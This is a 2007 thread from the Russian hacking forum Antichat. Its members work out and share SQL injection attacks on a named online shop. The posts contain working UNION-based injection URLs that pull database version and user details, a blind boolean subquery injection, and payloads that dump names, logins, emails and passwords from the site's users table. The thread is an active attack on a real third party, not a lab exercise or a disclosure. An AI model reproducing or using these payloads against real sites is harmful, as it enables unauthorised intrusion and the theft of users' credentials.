Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Скуль (https://forum.antichat.xyz/showthread.php?t=51097)

z01b	13.10.2007 15:23

Скуль

http://www.acasashop.md/?module=catalog&id=9999991'+union+select+0,1,2,3,4/*

Помогите плз перебрать к-во столбцов, а то не выходит у меня

groundhog

13.10.2007 15:42

У тебя заруб идёт на предварительном запрос, не на том, который выводится. Если бы ты был упорнее, ты бы нашёл модуль, где нету никаких предварительных запросов, ака "посчитать количество чего-либо" или "взять имя чего-то где модуль=чему-то". Например в модуле news есть SQL-Injection с выводом:

Цитата:

http://www.acasashop.md/?module=news&cmd=view&id=-16'+UNION+SELECT+1,2,3,CONCAT_WS(0x3a,USER(),VERSI ON(),DATABASE()),5,6/*

Scipio

13.10.2007 15:45

опередил.... лано от себя добавлю, что в модуле catalog можно пользовать подзапросы:
пример:

Код:

http://www.acasashop.md/?module=catalog&id=11'%20and%20ascii(substr((select%20version()),1,1))=52/*

z01b	13.10.2007 15:47

Спс большое, плюсеги поставил )

kair	13.10.2007 15:58

ну и я добавлю

http://www.acasashop.md/?module=news&cmd=view&id=-16'+UNION+SELECT+1,concat(name,char(58),login),ema il,CONCAT_WS(0x3a,USER(%20),VERSION(),DATABASE()), password,6%20from%20users/*

Piflit

13.10.2007 16:05

вы скули ищете тулзами или ручками?

groundhog

13.10.2007 16:10

Piflit, есть скули, которые ни одна тулза не найдёт, когда для каждой нужен индивидуальный подход, поэтому я предпочитаю прямые ручки в противовес прогам.

z01b	13.10.2007 16:11

Я ручьками )

kair	13.10.2007 16:14

и еще одна табличка)
http://www.acasashop.md/?module=news&cmd=view&id=-16'+UNION+SELECT+1,password,3,4,name,6%20from%20ie system_acasashop.users/*

groundhog

13.10.2007 16:27

kair, да ты потрошишь одну и ту же табличку... :))))

Время: 09:26